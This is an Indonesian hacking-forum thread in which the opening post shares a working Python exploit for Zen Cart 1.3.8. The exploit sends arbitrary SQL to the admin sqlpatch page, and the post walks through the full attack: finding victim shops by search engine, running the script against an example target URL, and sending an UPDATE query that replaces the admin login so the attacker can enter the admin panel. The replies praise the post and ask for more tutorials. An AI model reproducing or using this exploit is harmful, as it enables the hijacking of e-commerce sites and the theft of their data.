Bugs Zen Cart

Subyek: Bugs Zen Cart Thu Mar 11, 2010 7:42 pm

buka google ketik : powered by zen cart

Nama Negara

kalo udah nih ada pithon :

Code:: #!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
global a, b
for param in sys.argv:
   if(param == '-'+name): return str(sys.argv[b+1])
   b = b + 1
if(need):
   print '\n#error', "-"+name, 'parameter required'
   exit(1)

if (len(sys.argv) < 2):
print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=
========================================================================
| BlackH <Bl4ck.H@gmail.com> |
========================================================================
| |
| $system> python """+sys.argv[0]+""" -url <url> |
| Param: <url> ex: http://victim.com/site (no slash) |
| |
| Note: blind "injection" |
========================================================================
"""
exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
cmd = raw_input('sql@jah$ ')
if (cmd == "exit"): exit(1)
req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
   print '>> success (', cmd, ")"
else:
   print '>> failed, be sure to end with ; (', cmd, ")"

tuh pithon save dgn extensi zen.py

sebelum nya komputer kamu instal dlu pithon nya , kalo blum aja download aja di : http://www.python.org/ftp/python/2.5/python-2.5.msi

kalo udah buka cmd
misal zen.py kamu taruh di desktop bearti cmd kamu arahin ke desktop dlu

kalo udah ketik : zen.py -url htttp://webkorban.com
contohh : zen.py -url http://customizthat.com/2010/admin/ <--enter
trus nanti ada tulisan $sql@jah
aklo ada tulisan itu bearti masukin perintah : UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; trus enter

kalo berhasil maka akan muncul kayak ini : >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

contoh nya nih ss nya
Bugs Zen Cart 92079546

kalo udah succes, tinggal di url target ditambahin /admin/

kalo succes setiap username sama pasword nya itu adminz : wew

sekian dan terima kasih

Credits And Thanks To : Ichito Bandito And Amature BoyZ
Special Thanks To : Indonesian Hacker Team

Subyek: Re: Bugs Zen Cart Fri Mar 12, 2010 5:57 pm

wew....

nice post gan...

kren abizz...

Subyek: Re: Bugs Zen Cart Fri Mar 12, 2010 7:05 pm

wew ..
asli coy ..
jgn lpa d'ajarin gan ....
Other Mood

Subyek: Re: Bugs Zen Cart Sat Mar 13, 2010 12:09 am

@^

yeeeee......

itu juga udah di post,, tinggal praktek......................

Subyek: Re: Bugs Zen Cart Sat Mar 13, 2010 2:33 pm

edelweize the warlock wrote:: kalo udah succes, tinggal di url target ditambahin /admin/
[contohny: https://t0k3kmiringcrew.forummotion.com/admin]
kalo succes setiap username sama pasword nya itu admin : wew
.

gg ikut"an gan....

Subyek: Re: Bugs Zen Cart Sun Jul 31, 2011 4:11 pm

plus video tutor nya donk om nubie biat ngerti